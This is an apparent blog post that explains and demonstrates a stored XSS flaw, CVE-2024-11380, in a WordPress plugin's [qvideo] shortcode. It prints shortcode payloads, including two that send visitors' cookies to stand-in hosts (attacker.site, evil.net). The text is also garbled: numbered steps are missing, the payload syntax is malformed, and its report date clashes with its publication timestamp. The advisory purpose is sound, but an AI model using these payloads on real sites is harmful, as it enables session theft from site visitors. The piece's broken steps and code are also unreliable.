CVE-2024-11380 - Stored XSS in WordPress Mini Program API Plugin (qvideo Shortcode) All Versions ≤ 1.4.5 – Explained & Exploited

WordPress is the world’s favorite CMS, but sometimes its power comes with risk. On February 26, 2024, a security flaw was reported in the popular Mini Program API plugin that allows attackers to plant malicious scripts in WordPress sites. This long read explains what happened, how the flaw works, and what you can do — with real code examples and easy steps.

What is CVE-2024-11380?

CVE-2024-11380 is a vulnerability in the “Mini Program API” WordPress plugin (all versions up to and including 1.4.5) that allows stored Cross-Site Scripting (XSS) through the plugin’s [qvideo] shortcode. Stored XSS means malicious code can be stored on the site and executed every time someone visits a particular page.

Technical Details: Where’s the Bug?

The plugin’s [qvideo] shortcode lets users embed videos in posts. It takes several attributes, like src. Unfortunately, the plugin fails to sanitize/output escape these attribute values correctly.
That means you can slip JavaScript right into your published content.

Here’s what a standard [qvideo] shortcode looks like

[qvideo src="https://example.com/video.mp4";]

But in vulnerable versions, you can craft this

[qvideo src='x" onerror="alert(document.cookie)' ]

When the shortcode is rendered, the unescaped src attribute is put right into the HTML. The result

<video src='x" onerror="alert(document.cookie)'></video>

2. Create or edit a post/page and add this

[qvideo src='x" onerror="window.location=https://attacker.site/steal?c=+document.cookie' ]

Here’s a practical example Contributor users can try (don’t run on live sites!)

[qvideo src='1" onerror="fetch(https://evil.net?cookie=+document.cookie)' ]

This sends visitors’ cookies to evil.net.
You can also use payloads from PayloadsAllTheThings XSS repo.

Deactivate or remove the plugin if not actively needed.

3. Use a security plugin that blocks XSS payloads.
4. Restrict Contributor/Author accounts if you must keep the plugin.

References

- Official Plugin Page
- Wordfence CVE Page
- NVD Detail for CVE-2024-11380
- PayloadsAllTheThings XSS

If you want to check if your site is vulnerable, add this to a post as Contributor

[qvideo src='x" onerror="alert(1)' ]

If you see a popup when viewing the post, you’re at risk.


Summary:
CVE-2024-11380 in the Mini Program API plugin is serious, allowing easy stored XSS through sloppy input validation. Update, audit, and stay alert before attackers find your site!

Timeline

Published on: 12/07/2024 12:15:17 UTC